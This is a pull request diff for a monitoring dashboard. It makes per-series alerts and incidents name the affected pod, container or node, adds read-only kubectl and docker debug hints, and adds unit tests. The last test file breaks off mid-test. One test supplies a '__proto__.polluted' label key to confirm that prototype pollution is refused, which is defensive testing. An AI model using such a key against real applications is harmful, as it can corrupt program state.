### PR TITLE
fix(alerts): name the pod, container and node an alert is actually about

### DIFF
--- a/App/FeatureSet/Dashboard/src/Pages/Alerts/View/AffectedResources.tsx
+++ b/App/FeatureSet/Dashboard/src/Pages/Alerts/View/AffectedResources.tsx
@@ -8,8 +8,10 @@ import React, {
   useState,
 } from "react";
 import Card from "Common/UI/Components/Card/Card";
-import DictionaryOfStringsViewer from "Common/UI/Components/Dictionary/DictionaryOfStingsViewer";
-import Dictionary from "Common/Types/Dictionary";
+import SeriesLabelsViewer from "Common/UI/Components/Monitor/SeriesLabelsViewer";
+import SeriesDebugCommandsViewer from "Common/UI/Components/Monitor/SeriesDebugCommandsViewer";
+import SeriesDebugHints from "Common/Types/Monitor/SeriesContext/SeriesDebugHints";
+import MonitorType from "Common/Types/Monitor/MonitorType";
 import { JSONObject } from "Common/Types/JSON";
 import ModelAPI from "Common/UI/Utils/ModelAPI/ModelAPI";
 import { PromiseVoidFunction } from "Common/Types/FunctionTypes";
@@ -22,9 +24,16 @@ export interface ComponentProps {
 const AlertAffectedResources: FunctionComponent<ComponentProps> = (
   props: ComponentProps,
 ): ReactElement => {
-  const [seriesLabels, setSeriesLabels] = useState<
-    Dictionary<string> | undefined
-  >(undefined);
+  const [seriesLabels, setSeriesLabels] = useState<JSONObject | undefined>(
+    undefined,
+  );
+  /*
+   * The monitor type decides which commands make sense for this series
+   * (kubectl vs docker vs df), so it is fetched alongside the labels.
+   */
+  const [monitorType, setMonitorType] = useState<MonitorType | undefined>(
+    undefined,
+  );
 
   const fetchSeriesLabels: PromiseVoidFunction = async (): Promise<void> => {
     try {
@@ -45,17 +54,36 @@ const AlertAffectedResources: FunctionComponent<ComponentProps> = (
         return;
       }
 
-      const stringLabels: Dictionary<string> = {};
-      for (const key of Object.keys(labels)) {
-        const value: unknown = labels[key];
-        stringLabels[key] =
-          value === undefined || value === null ? "" : String(value);
-      }
-
-      setSeriesLabels(stringLabels);
+      setSeriesLabels(labels);
     } catch (err) {
       API.getFriendlyMessage(err);
       setSeriesLabels(undefined);
+    }
+  };
+
+  /*
+   * Deliberately a SEPARATE request from the labels above. The monitor
+   * type only decides which suggested commands to show, and reading it
+   * crosses into the Monitor model - a role with alert access but no
+   * monitor read permission would fail the whole query. Asking for it on
+   * its own means that user still gets the Affected Resource table and
+   * simply no command suggestions.
+   */
+  const fetchMonitorType: PromiseVoidFunction = async (): Promise<void> => {
+    try {
+      const alert: Alert | null = await ModelAPI.getItem({
+        modelType: Alert,
+        id: props.alertId,
+        select: {
+          monitor: {
+            monitorType: true,
+          },
+        },
+      });
+
+      setMonitorType(alert?.monitor?.monitorType);
+    } catch {
+      setMonitorType(undefined);
     }
   };
 
@@ -63,11 +91,20 @@ const AlertAffectedResources: FunctionComponent<ComponentProps> = (
     fetchSeriesLabels().catch(() => {
       // handled inside fetchSeriesLabels
     });
+    fetchMonitorType().catch(() => {
+      // handled inside fetchMonitorType
+    });
   }, [props.alertId]);
 
   if (!seriesLabels) {
     return <Fragment />;
   }
+
+  const hasDebugCommands: boolean =
+    SeriesDebugHints.getDebugCommands({
+      monitorType: monitorType,
+      seriesLabels: seriesLabels,
+    }).length > 0;
 
   return (
     <Fragment>
@@ -75,8 +112,21 @@ const AlertAffectedResources: FunctionComponent<ComponentProps> = (
         title="Affected Resource"
         description="The specific resource (e.g. host, pod, container) that triggered this alert. Present when a metric monitor is grouped by one or more attributes."
       >
-        <DictionaryOfStringsViewer value={seriesLabels} />
+        <SeriesLabelsViewer seriesLabels={seriesLabels} />
       </Card>
+      {hasDebugCommands ? (
+        <Card
+          title="Start Here"
+          description="Read-only commands for this exact resource, already filled in. Nothing here changes state."
+        >
+          <SeriesDebugCommandsViewer
+            monitorType={monitorType}
+            seriesLabels={seriesLabels}
+          />
+        </Card>
+      ) : (
+        <Fragment />
+      )}
     </Fragment>
   );
 };

--- a/App/FeatureSet/Dashboard/src/Pages/Incidents/View/AffectedResources.tsx
+++ b/App/FeatureSet/Dashboard/src/Pages/Incidents/View/AffectedResources.tsx
@@ -8,8 +8,10 @@ import React, {
   useState,
 } from "react";
 import Card from "Common/UI/Components/Card/Card";
-import DictionaryOfStringsViewer from "Common/UI/Components/Dictionary/DictionaryOfStingsViewer";
-import Dictionary from "Common/Types/Dictionary";
+import SeriesLabelsViewer from "Common/UI/Components/Monitor/SeriesLabelsViewer";
+import SeriesDebugCommandsViewer from "Common/UI/Components/Monitor/SeriesDebugCommandsViewer";
+import SeriesDebugHints from "Common/Types/Monitor/SeriesContext/SeriesDebugHints";
+import MonitorType from "Common/Types/Monitor/MonitorType";
 import { JSONObject } from "Common/Types/JSON";
 import ModelAPI from "Common/UI/Utils/ModelAPI/ModelAPI";
 import { PromiseVoidFunction } from "Common/Types/FunctionTypes";
@@ -22,9 +24,16 @@ export interface ComponentProps {
 const IncidentAffectedResources: FunctionComponent<ComponentProps> = (
   props: ComponentProps,
 ): ReactElement => {
-  const [seriesLabels, setSeriesLabels] = useState<
-    Dictionary<string> | undefined
-  >(undefined);
+  const [seriesLabels, setSeriesLabels] = useState<JSONObject | undefined>(
+    undefined,
+  );
+  /*
+   * The monitor type decides which commands make sense for this series
+   * (kubectl vs docker vs df), so it is fetched alongside the labels.
+   */
+  const [monitorType, setMonitorType] = useState<MonitorType | undefined>(
+    undefined,
+  );
 
   const fetchSeriesLabels: PromiseVoidFunction = async (): Promise<void> => {
     try {
@@ -45,17 +54,10 @@ const IncidentAffectedResources: FunctionComponent<ComponentProps> = (
         return;
       }
 
-      const stringLabels: Dictionary<string> = {};
-      for (const key of Object.keys(labels)) {
-        const value: unknown = labels[key];
-        stringLabels[key] =
-          value === undefined || value === null ? "" : String(value);
-      }
-
-      setSeriesLabels(stringLabels);
+      setSeriesLabels(labels);
     } catch (err) {
       /*
-       * Fetch failure is not worth surfacing — the section simply doesn't
+       * Fetch failure is not worth surfacing - the section simply doesn't
        * render. The main incident detail shows the error state.
        */
       API.getFriendlyMessage(err);
@@ -63,9 +65,43 @@ const IncidentAffectedResources: FunctionComponent<ComponentProps> = (
     }
   };
 
+  /*
+   * Deliberately a SEPARATE request from the labels above. The monitor
+   * type only decides which suggested commands to show, and reading it
+   * crosses into the Monitor model - a role with incident access but no
+   * monitor read permission would fail the whole query. Asking for it on
+   * its own means that user still gets the Affected Resource table and
+   * simply no command suggestions.
+   */
+  const fetchMonitorType: PromiseVoidFunction = async (): Promise<void> => {
+    try {
+      const incident: Incident | null = await ModelAPI.getItem({
+        modelType: Incident,
+        id: props.incidentId,
+        select: {
+          monitors: {
+            monitorType: true,
+          },
+        },
+      });
+
+      /*
+       * An incident can be attached to several monitors, but a
+       * per-series incident is always created by exactly one criteria on
+       * one monitor, so the first is the one that raised it.
+       */
+      setMonitorType(incident?.monitors?.[0]?.monitorType);
+    } catch {
+      setMonitorType(undefined);
+    }
+  };
+
   useEffect(() => {
     fetchSeriesLabels().catch(() => {
       // handled inside fetchSeriesLabels
+    });
+    fetchMonitorType().catch(() => {
+      // handled inside fetchMonitorType
     });
   }, [props.incidentId]);
 
@@ -73,14 +109,33 @@ const IncidentAffectedResources: FunctionComponent<ComponentProps> = (
     return <Fragment />;
   }
 
+  const hasDebugCommands: boolean =
+    SeriesDebugHints.getDebugCommands({
+      monitorType: monitorType,
+      seriesLabels: seriesLabels,
+    }).length > 0;
+
   return (
     <Fragment>
       <Card
         title="Affected Resource"
         description="The specific resource (e.g. host, pod, container) that triggered this incident. Present when a metric monitor is grouped by one or more attributes."
       >
-        <DictionaryOfStringsViewer value={seriesLabels} />
+        <SeriesLabelsViewer seriesLabels={seriesLabels} />
       </Card>
+      {hasDebugCommands ? (
+        <Card
+          title="Start Here"
+          description="Read-only commands for this exact resource, already filled in. Nothing here changes state."
+        >
+          <SeriesDebugCommandsViewer
+            monitorType={monitorType}
+            seriesLabels={seriesLabels}
+          />
+        </Card>
+      ) : (
+        <Fragment />
+      )}
     </Fragment>
   );
 };

--- a/Common/Server/Utils/Monitor/MonitorAlert.ts
+++ b/Common/Server/Utils/Monitor/MonitorAlert.ts
@@ -26,6 +26,7 @@ import CaptureSpan from "../Telemetry/CaptureSpan";
 import DataToProcess from "./DataToProcess";
 import MonitorResourceContextUtil from "./MonitorResourceContext";
 import MonitorTemplateUtil from "./MonitorTemplateUtil";
+import SeriesContextEnricher from "./SeriesContextEnricher";
 import SeriesResourceLinker, {
   SeriesResolvedResourceIds,
 } from "./SeriesResourceLinker";
@@ -534,13 +535,35 @@ export default class MonitorAlert {
               seriesLabels,
             });
 
-          alert.title = MonitorTemplateUtil.processTemplateString({
-            value: criteriaAlert.title,
-            storageMap,
+          /*
+           * Render the criteria's template, then make it say WHICH
+           * series it is about.
+           *
+           * The criteria title is one fixed string shared by every
+           * series on the monitor, so without the enricher a cluster
+           * with fifty saturated pods produced fifty alerts whose
+           * titles were character-for-character identical - and the
+           * alert list, the Slack message and the phone notification
+           * all showed the same undifferentiated line. The enricher is
+           * a no-op when the monitor is not grouped, and when the
+           * rendered text already names the series (because the user
+           * put `{{seriesResourceSuffix}}` or the raw label variables
+           * in their own template).
+           */
+          alert.title = SeriesContextEnricher.enrichTitle({
+            title: MonitorTemplateUtil.processTemplateString({
+              value: criteriaAlert.title,
+              storageMap,
+            }),
+            seriesLabels,
           });
-          alert.description = MonitorTemplateUtil.processTemplateString({
-            value: criteriaAlert.description,
-            storageMap,
+          alert.description = SeriesContextEnricher.enrichDescription({
+            description: MonitorTemplateUtil.processTemplateString({
+              value: criteriaAlert.description,
+              storageMap,
+            }),
+            seriesLabels,
+            monitorType: input.monitor.monitorType,
           });
 
           /*

--- a/Common/Server/Utils/Monitor/MonitorIncident.ts
+++ b/Common/Server/Utils/Monitor/MonitorIncident.ts
@@ -27,6 +27,7 @@ import logger, { LogAttributes } from "../Logger";
 import CaptureSpan from "../Telemetry/CaptureSpan";
 import DataToProcess from "./DataToProcess";
 import MonitorTemplateUtil from "./MonitorTemplateUtil";
+import SeriesContextEnricher from "./SeriesContextEnricher";
 import MonitorDependencySuppression, {
   DependencySuppressionResult,
 } from "./MonitorDependencySuppression";
@@ -597,13 +598,28 @@ export default class MonitorIncident {
               seriesLabels,
             });
 
-          incident.title = MonitorTemplateUtil.processTemplateString({
-            value: criteriaIncident.title,
-            storageMap,
+          /*
+           * Render the criteria's template, then make it say WHICH
+           * series it is about. Mirrors MonitorAlert exactly - the two
+           * must agree, or the same breach reads differently depending
+           * on whether the criteria was configured to raise an alert or
+           * an incident. See SeriesContextEnricher for why this is not
+           * done inside the template itself.
+           */
+          incident.title = SeriesContextEnricher.enrichTitle({
+            title: MonitorTemplateUtil.processTemplateString({
+              value: criteriaIncident.title,
+              storageMap,
+            }),
+            seriesLabels,
           });
-          incident.description = MonitorTemplateUtil.processTemplateString({
-            value: criteriaIncident.description,
-            storageMap,
+          incident.description = SeriesContextEnricher.enrichDescription({
+            description: MonitorTemplateUtil.processTemplateString({
+              value: criteriaIncident.description,
+              storageMap,
+            }),
+            seriesLabels,
+            monitorType: input.monitor.monitorType,
           });
 
           /*

--- a/Common/Server/Utils/Monitor/MonitorTemplateUtil.ts
+++ b/Common/Server/Utils/Monitor/MonitorTemplateUtil.ts
@@ -32,6 +32,8 @@ import ExternalStatusPageMonitorResponse, {
 } from "../../../Types/Monitor/ExternalStatusPageMonitor/ExternalStatusPageMonitorResponse";
 import MetricMonitorResponse from "../../../Types/Monitor/MetricMonitor/MetricMonitorResponse";
 import Typeof from "../../../Types/Typeof";
+import SeriesDebugHints from "../../../Types/Monitor/SeriesContext/SeriesDebugHints";
+import SeriesLabelDisplay from "../../../Types/Monitor/SeriesContext/SeriesLabelDisplay";
 import VMUtil from "../VM/VMAPI";
 import DataToProcess from "./DataToProcess";
 import logger from "../Logger";
@@ -626,6 +628,33 @@ export default class MonitorTemplateUtil {
       }
       storageMap["seriesLabels"] = data.seriesLabels;
     }
+
+    /*
+     * Ready-made renderings of the series identity.
+     *
+     * These are set unconditionally - to "" when the monitor is not
+     * grouped, or when its labels carry no usable value - and that is
+     * the whole point. `VMUtil.replaceValueInPlace` leaves a placeholder
+     * it cannot resolve in the output verbatim, so a title written as
+     * `"Pod CPU high{{seriesResourceSuffix}}"` would otherwise render
+     * with the braces still in it on any monitor without a group-by.
+     * Always defining them makes the variables safe to use in a shipped
+     * template that has to work for grouped and ungrouped monitors
+     * alike.
+     */
+    storageMap["seriesResourceSuffix"] = SeriesLabelDisplay.buildTitleSuffix(
+      data.seriesLabels,
+    );
+    storageMap["seriesResourceSummary"] = SeriesLabelDisplay.buildInlineSummary(
+      data.seriesLabels,
+    );
+    storageMap["seriesResourceBlock"] = SeriesLabelDisplay.buildMarkdownBlock(
+      data.seriesLabels,
+    );
+    storageMap["seriesDebugCommands"] = SeriesDebugHints.buildMarkdownBlock({
+      monitorType: data.monitorType,
+      seriesLabels: data.seriesLabels,
+    });
 
     /*
      * Monitor identity fields. Always exposed (when a monitor is provided),

--- a/Common/Server/Utils/Monitor/SeriesContextEnricher.ts
+++ b/Common/Server/Utils/Monitor/SeriesContextEnricher.ts
@@ -1,0 +1,304 @@
+import ColumnLength from "../../../Types/Database/ColumnLength";
+import { JSONObject } from "../../../Types/JSON";
+import MonitorType from "../../../Types/Monitor/MonitorType";
+import SeriesDebugHints from "../../../Types/Monitor/SeriesContext/SeriesDebugHints";
+import SeriesLabelDisplay, {
+  DisplaySeriesLabel,
+} from "../../../Types/Monitor/SeriesContext/SeriesLabelDisplay";
+
+/*
+ * Make a per-series alert or incident say WHICH pod, container, node or
+ * mount it is about.
+ *
+ * A grouped metric monitor raises one alert per breaching series and
+ * stores that series' identity in `seriesLabels`. Until now the identity
+ * stopped there: the title came from the criteria template, which is one
+ * fixed string shared by every series, so a cluster with fifty saturated
+ * pods produced fifty alerts whose titles were character-for-character
+ * identical. The identity was reachable - in a table, at the bottom of
+ * the alert detail page - but the alert list, the Slack message, the
+ * email and the phone notification all showed the same undifferentiated
+ * line.
+ *
+ * This enricher runs at creation time, after the criteria template has
+ * been rendered, and appends the series identity to the title and a
+ * resource + first-commands block to the description.
+ *
+ * Two properties matter and are covered by tests:
+ *
+ *   - It never fights the user's own template. A title that already
+ *     names the series (because the user wrote `{{resource.k8s.pod.name}}`
+ *     into it, or because the new `{{seriesResourceSuffix}}` variable
+ *     expanded there) is left exactly as the user wrote it. The check is
+ *     on the VALUES, not on the placeholders, so it works the same
+ *     whether the identity arrived from a template variable or was typed
+ *     literally.
+ *
+ *   - It is a no-op for whole-monitor alerts. A monitor with no group-by
+ *     has no series identity, and nothing is appended.
+ */
+
+/*
+ * Hoisted rather than written inline at its single use site: two lint
+ * rules disagree about parenthesising a regex literal in an expression
+ * and `--fix` oscillates between them (ESLintCircularFixesWarning). A
+ * named constant sidesteps the argument and reads better anyway.
+ */
+const WordCharacterPattern: RegExp = /[A-Za-z0-9]/;
+
+export default class SeriesContextEnricher {
+  /**
+   * The `title` column's own limit, taken from the schema rather than
+   * restated as a number - `Alert.title` and `Incident.title` are both
+   * `ColumnType.LongText`.
+   */
+  private static readonly MaxTitleLength: number = ColumnLength.LongText;
+
+  /**
+   * Shortest label value that may be matched as a bare substring.
+   *
+   * Ceph pool ids and Proxmox vmids are one or two characters, and
+   * "does the title contain 3?" is answered `true` by any title with a
+   * threshold in it ("Restarts > 3"). Below this length only this
+   * module's own `Name: value` rendering counts as a mention, which
+   * keeps idempotency without letting a coincidence swallow the
+   * identity.
+   */
+  private static readonly MinimumMatchableValueLength: number = 4;
+
+  /**
+   * What counts as "part of the same word" when deciding whether a
+   * value found in the text is really a mention of it.
+   *
+   * Deliberately narrower than `\w`: `-`, `.`, `/` and `_` all appear
+   * inside the values themselves (pod names, mountpoints, Ceph daemon
+   * ids), so treating them as word characters would make a value that
+   * IS present look like part of a longer token.
+   */
+  private static isWordCharacter(character: string): boolean {
+    if (character === "") {
+      return false;
+    }
+
+    return WordCharacterPattern.test(character);
+  }
+
+  /**
+   * Whether `text` already names this label's value.
+   *
+   * Two ways to be already-named, and both matter:
+   *
+   *   - This module's own rendering (`"Pod: web-1"`) is matched exactly.
+   *     That is what makes the enricher idempotent, whatever the value
+   *     looks like.
+   *
+   *   - A distinctive value appearing anywhere on a token boundary. That
+   *     is the user's own template - `{{resource.k8s.pod.name}}` has
+   *     already expanded by the time this runs, so the check has to be
+   *     on the VALUE, not on the placeholder. The boundary requirement
+   *     stops a pod called `web` from counting as mentioned because the
+   *     title happens to contain the word "website".
+   */
+  private static isValueMentioned(input: {
+    text: string;
+    label: DisplaySeriesLabel;
+  }): boolean {
+    const { text, label } = input;
+
+    if (text.includes(`${label.name}: ${label.value}`)) {
+      return true;
+    }
+
+    if (
+      label.value.length < SeriesContextEnricher.MinimumMatchableValueLength
+    ) {
+      return false;
+    }
+
+    let searchFrom: number = 0;
+
+    for (;;) {
+      const index: number = text.indexOf(label.value, searchFrom);
+
+      if (index === -1) {
+        return false;
+      }
+
+      const before: string = index > 0 ? text.charAt(index - 1) : "";
+      const after: string = text.charAt(index + label.value.length);
+
+      if (
+        !SeriesContextEnricher.isWordCharacter(before) &&
+        !SeriesContextEnricher.isWordCharacter(after)
+      ) {
+        return true;
+      }
+
+      searchFrom = index + 1;
+    }
+  }
+
+  /*
+   * The identity labels not already present in `text`.
+   *
+   * Deliberately per-label rather than all-or-nothing: a title that
+   * mentions the pod by name but not the namespace still gets the
+   * namespace appended, because dropping the rest whenever a user's
+   * template happened to mention one identifier would lose exactly the
+   * context this exists to add.
+   */
+  private static getUnmentionedLabels(input: {
+    text: string;
+    seriesLabels: JSONObject | undefined;
+  }): Array<DisplaySeriesLabel> {
+    const labels: Array<DisplaySeriesLabel> =
+      SeriesLabelDisplay.getDisplayLabels(input.seriesLabels);
+
+    if (labels.length === 0) {
+      return [];
+    }
+
+    const text: string = input.text || "";
+
+    return labels.filter((label: DisplaySeriesLabel) => {
+      return !SeriesContextEnricher.isValueMentioned({ text, label });
+    });
+  }
+
+  /*
+   * `title` with the series identity appended, or `title` unchanged when
+   * there is no identity to add or the title already carries it.
+   */
+  public static enrichTitle(input: {
+    title: string;
+    seriesLabels: JSONObject | undefined;
+  }): string {
+    const title: string = input.title || "";
+
+    const unmentioned: Array<DisplaySeriesLabel> =
+      SeriesContextEnricher.getUnmentionedLabels({
+        text: title,
+        seriesLabels: input.seriesLabels,
+      });
+
+    if (unmentioned.length === 0) {
+      return title;
+    }
+
+    /*
+     * Rebuild a label map from just the unmentioned labels so the
+     * shared formatter still applies its own ordering and title cap
+     * rather than this module reimplementing either.
+     */
+    const remaining: JSONObject = {};
+
+    for (const label of unmentioned) {
+      remaining[label.key] = label.value;
+    }
+
+    const suffix: string = SeriesLabelDisplay.buildTitleSuffix(remaining);
+
+    if (!suffix) {
+      return title;
+    }
+
+    /*
+     * `Alert.title` and `Incident.title` are LongText, i.e. 500
+     * characters. Overflowing the column does not produce a shortened
+     * title - it fails the INSERT, and the alert does not exist at all.
+     * That would turn a labelling improvement into dropped pages, so the
+     * appended identity is bounded here as well as per-value inside
+     * SeriesLabelDisplay.
+     *
+     * A base title that is ALREADY at or over the limit is returned
+     * untouched: it was going to fail with or without this enricher, and
+     * silently truncating what the user wrote is not this module's call
+     * to make.
+     */
+    if (title.length >= SeriesContextEnricher.MaxTitleLength) {
+      return title;
+    }
+
+    const room: number = SeriesContextEnricher.MaxTitleLength - title.length;
+
+    if (suffix.length <= room) {
+      return `${title}${suffix}`;
+    }
+
+    return `${title}${suffix.slice(0, room)}`;
+  }
+
+  /*
+   * `description` with an "Affected resource" block and the read-only
+   * commands worth running first appended.
+   *
+   * The description is what reaches Slack, email and the mobile push, so
+   * this is where the full identity goes - the title only has room for
+   * the top few labels.
+   */
+  public static enrichDescription(input: {
+    description: string;
+    seriesLabels: JSONObject | undefined;
+    monitorType: MonitorType | undefined;
+  }): string {
+    const description: string = input.description || "";
+
+    const labels: Array<DisplaySeriesLabel> =
+      SeriesLabelDisplay.getDisplayLabels(input.seriesLabels);
+
+    if (labels.length === 0) {
+      return description;
+    }
+
+    const sections: Array<string> = [];
+
+    /*
+     * Only skip the resource block when the description already names
+     * EVERY label. A description mentioning the pod but not the node is
+     * still missing the thing the engineer needs.
+     */
+    const unmentioned: Array<DisplaySeriesLabel> =
+      SeriesContextEnricher.getUnmentionedLabels({
+        text: description,
+        seriesLabels: input.seriesLabels,
+      });
+
+    const block: string = SeriesLabelDisplay.buildMarkdownBlock(
+      input.seriesLabels,
+    );
+
+    /*
+     * The exact-block check is the idempotency guarantee. Per-label
+     * matching alone cannot provide it: a one-character label value
+     * (a Ceph pool id, a Proxmox vmid) is deliberately not matched as a
+     * bare substring, so a second pass would append the block again.
+     */
+    if (unmentioned.length > 0 && block && !description.includes(block)) {
+      sections.push(block);
+    }
+
+    const commandsBlock: string = SeriesDebugHints.buildMarkdownBlock({
+      monitorType: input.monitorType,
+      seriesLabels: input.seriesLabels,
+    });
+
+    /*
+     * The commands embed the label values, so a description that
+     * already carries them would otherwise get a near-duplicate block
+     * appended on top of a user's own runbook snippet.
+     */
+    if (commandsBlock && !description.includes(commandsBlock)) {
+      sections.push(commandsBlock);
+    }
+
+    if (sections.length === 0) {
+      return description;
+    }
+
+    if (!description.trim()) {
+      return sections.join("\n\n");
+    }
+
+    return `${description}\n\n${sections.join("\n\n")}`;
+  }
+}

--- a/Common/Tests/Server/Utils/Monitor/MonitorTemplateUtilSeriesContext.test.ts
+++ b/Common/Tests/Server/Utils/Monitor/MonitorTemplateUtilSeriesContext.test.ts
@@ -1,0 +1,176 @@
+import { JSONObject } from "../../../../Types/JSON";
+import MonitorType from "../../../../Types/Monitor/MonitorType";
+import DataToProcess from "../../../../Server/Utils/Monitor/DataToProcess";
+import MonitorTemplateUtil from "../../../../Server/Utils/Monitor/MonitorTemplateUtil";
+
+/*
+ * The series-identity template variables.
+ *
+ * The load-bearing property is that they are ALWAYS DEFINED. VMUtil's
+ * substitution leaves a placeholder it cannot resolve in the output
+ * verbatim, so a shipped template written as
+ *
+ *   "Pod CPU high{{seriesResourceSuffix}}"
+ *
+ * would render with the braces still in it on any monitor without a
+ * group-by. Defining them as "" instead is what makes a single template
+ * safe for grouped and ungrouped monitors alike - which is the whole
+ * reason these exist alongside the raw `{{resource.k8s.pod.name}}`
+ * label variables.
+ */
+
+const EMPTY_DATA: DataToProcess = {} as unknown as DataToProcess;
+
+function buildStorageMap(seriesLabels?: JSONObject | undefined): JSONObject {
+  return MonitorTemplateUtil.buildTemplateStorageMap({
+    monitorType: MonitorType.Kubernetes,
+    dataToProcess: EMPTY_DATA,
+    seriesLabels,
+  });
+}
+
+describe("MonitorTemplateUtil - series context variables", () => {
+  describe("always defined", () => {
+    test.each([
+      "seriesResourceSuffix",
+      "seriesResourceSummary",
+      "seriesResourceBlock",
+      "seriesDebugCommands",
+    ])("%s is defined when the monitor has no group-by", (key: string) => {
+      const storageMap: JSONObject = buildStorageMap(undefined);
+
+      expect(storageMap[key]).toBeDefined();
+      expect(storageMap[key]).toBe("");
+    });
+
+    test.each([
+      "seriesResourceSuffix",
+      "seriesResourceSummary",
+      "seriesResourceBlock",
+      "seriesDebugCommands",
+    ])("%s is defined for an empty label map", (key: string) => {
+      expect(buildStorageMap({})[key]).toBe("");
+    });
+
+    test("an unresolved placeholder never leaks into a rendered title", () => {
+      /*
+       * This is the failure mode the "always defined" rule prevents, and
+       * the assertion that would have caught it.
+       */
+      const rendered: string = MonitorTemplateUtil.processTemplateString({
+        value: "[K8s] Pod CPU high{{seriesResourceSuffix}}",
+        storageMap: buildStorageMap(undefined),
+      });
+
+      expect(rendered).toBe("[K8s] Pod CPU high");
+      expect(rendered).not.toContain("{{");
+    });
+  });
+
+  describe("resolved values", () => {
+    const POD_LABELS: JSONObject = {
+      "resource.k8s.namespace.name": "prod",
+      "resource.k8s.pod.name": "checkout-7d9f-2xk",
+      "resource.k8s.node.name": "ip-10-0-3-14",
+    };
+
+    test("the suffix renders the identity, separator included", () => {
+      expect(buildStorageMap(POD_LABELS)["seriesResourceSuffix"]).toBe(
+        " - Pod: checkout-7d9f-2xk | Namespace: prod | Node: ip-10-0-3-14",
+      );
+    });
+
+    test("the summary is the same text without the leading separator", () => {
+      expect(buildStorageMap(POD_LABELS)["seriesResourceSummary"]).toBe(
+        "Pod: checkout-7d9f-2xk | Namespace: prod | Node: ip-10-0-3-14",
+      );
+    });
+
+    test("the block lists every label as markdown", () => {
+      const block: string = buildStorageMap(POD_LABELS)[
+        "seriesResourceBlock"
+      ] as string;
+
+      expect(block).toContain("**Affected resource**");
+      expect(block).toContain("- **Pod:** `checkout-7d9f-2xk`");
+      expect(block).toContain("- **Node:** `ip-10-0-3-14`");
+    });
+
+    test("the commands are built for the monitor's own type", () => {
+      const kubernetesCommands: string =
+        MonitorTemplateUtil.buildTemplateStorageMap({
+          monitorType: MonitorType.Kubernetes,
+          dataToProcess: EMPTY_DATA,
+          seriesLabels: POD_LABELS,
+        })["seriesDebugCommands"] as string;
+
+      const dockerCommands: string =
+        MonitorTemplateUtil.buildTemplateStorageMap({
+          monitorType: MonitorType.Docker,
+          dataToProcess: EMPTY_DATA,
+          seriesLabels: { "resource.container.name": "nginx" },
+        })["seriesDebugCommands"] as string;
+
+      expect(kubernetesCommands).toContain("kubectl describe pod");
+      expect(dockerCommands).toContain("docker logs");
+      expect(dockerCommands).not.toContain("kubectl");
+    });
+
+    test("a title template composed of static text and the suffix renders cleanly", () => {
+      expect(
+        MonitorTemplateUtil.processTemplateString({
+          value:
+            "[K8s] Pod CPU Saturating Container Limit{{seriesResourceSuffix}}",
+          storageMap: buildStorageMap(POD_LABELS),
+        }),
+      ).toBe(
+        "[K8s] Pod CPU Saturating Container Limit - Pod: checkout-7d9f-2xk | Namespace: prod | Node: ip-10-0-3-14",
+      );
+    });
+  });
+
+  describe("coexistence with the raw label variables", () => {
+    test("the dotted label variables still resolve alongside the new ones", () => {
+      /*
+       * The raw variables are the escape hatch for a user who wants full
+       * control of the wording. Adding the convenience variables must not
+       * have displaced them.
+       */
+      const storageMap: JSONObject = buildStorageMap({
+        "resource.k8s.pod.name": "checkout-7d9f-2xk",
+      });
+
+      expect(
+        MonitorTemplateUtil.processTemplateString({
+          value: "Pod {{resource.k8s.pod.name}} is throttled",
+          storageMap,
+        }),
+      ).toBe("Pod checkout-7d9f-2xk is throttled");
+    });
+
+    test("the full label map is still exposed for iteration", () => {
+      const storageMap: JSONObject = buildStorageMap({
+        "resource.k8s.pod.name": "web-1",
+      });
+
+      expect(storageMap["seriesLabels"]).toEqual({
+        "resource.k8s.pod.name": "web-1",
+      });
+    });
+
+    test("a prototype-walking label key is still refused", () => {
+      /*
+       * Series label keys are attacker-adjacent (a monitor script picks
+       * them outright via oneuptime.captureMetric). Folding them onto the
+       * storage map must keep refusing __proto__ - and the new variables
+       * must not have introduced a second path that folds them.
+       */
+      const storageMap: JSONObject = buildStorageMap({
+        "__proto__.polluted": "yes",
+      });
+
+      expect(({} as JSONObject)["polluted"]).toBeUndefined();
+      expect(storageMap["seriesResourceSuffix"]).toBeDefined();
+    });
+  });
+});

--- a/Common/Tests/Server/Utils/Monitor/SeriesContextEnricher.test.ts
+++ b/Common/Tests/Server/Utils/Monitor/SeriesContextEnricher.test.ts
@@ -1,0 +1,356 @@
+import { JSONObject } from "../../../../Types/JSON";
+import MonitorType from "../../../../Types/Monitor/MonitorType";
+import SeriesContextEnricher from "../../../../Server/Utils/Monitor/SeriesContextEnricher";
+
+/*
+ * The regression this enricher exists for:
+ *
+ * A grouped Kubernetes monitor raised 49 alerts on one test cluster, all
+ * titled
+ *
+ *   "[K8s] Pod CPU Saturating Container Limit (>90%) - oneuptime-test -
+ *    Pod CPU Saturating Container Limit"
+ *
+ * character for character. The pod that was actually throttled was known
+ * - it was stored on the alert as seriesLabels - but the title comes
+ * from the criteria template, which is one fixed string shared by every
+ * series, so the alert list, the Slack message and the phone
+ * notification all showed the same undifferentiated line.
+ *
+ * The tests below fix the two halves of that: identity reaches the
+ * title, and it never fights a template the user wrote themselves.
+ */
+
+const POD_LABELS: JSONObject = {
+  "resource.k8s.namespace.name": "prod",
+  "resource.k8s.pod.name": "checkout-7d9f-2xk",
+  "resource.k8s.node.name": "ip-10-0-3-14",
+};
+
+describe("SeriesContextEnricher", () => {
+  describe("enrichTitle", () => {
+    test("appends the series identity to a template-rendered title", () => {
+      expect(
+        SeriesContextEnricher.enrichTitle({
+          title: "[K8s] Pod CPU Saturating Container Limit (>90%)",
+          seriesLabels: POD_LABELS,
+        }),
+      ).toBe(
+        "[K8s] Pod CPU Saturating Container Limit (>90%) - Pod: checkout-7d9f-2xk | Namespace: prod | Node: ip-10-0-3-14",
+      );
+    });
+
+    test("two series of one monitor no longer share a title", () => {
+      const title: string = "[K8s] Pod CPU Saturating Container Limit (>90%)";
+
+      const first: string = SeriesContextEnricher.enrichTitle({
+        title,
+        seriesLabels: {
+          "resource.k8s.namespace.name": "prod",
+          "resource.k8s.pod.name": "checkout-7d9f-2xk",
+        },
+      });
+      const second: string = SeriesContextEnricher.enrichTitle({
+        title,
+        seriesLabels: {
+          "resource.k8s.namespace.name": "prod",
+          "resource.k8s.pod.name": "search-5b2c-9qq",
+        },
+      });
+
+      expect(first).not.toBe(second);
+      expect(first).toContain("checkout-7d9f-2xk");
+      expect(second).toContain("search-5b2c-9qq");
+    });
+
+    test("is a no-op for a monitor with no group-by", () => {
+      const title: string = "[K8s] etcd No Leader";
+
+      expect(
+        SeriesContextEnricher.enrichTitle({ title, seriesLabels: {} }),
+      ).toBe(title);
+      expect(
+        SeriesContextEnricher.enrichTitle({ title, seriesLabels: undefined }),
+      ).toBe(title);
+    });
+
+    test("is a no-op when every label value is empty", () => {
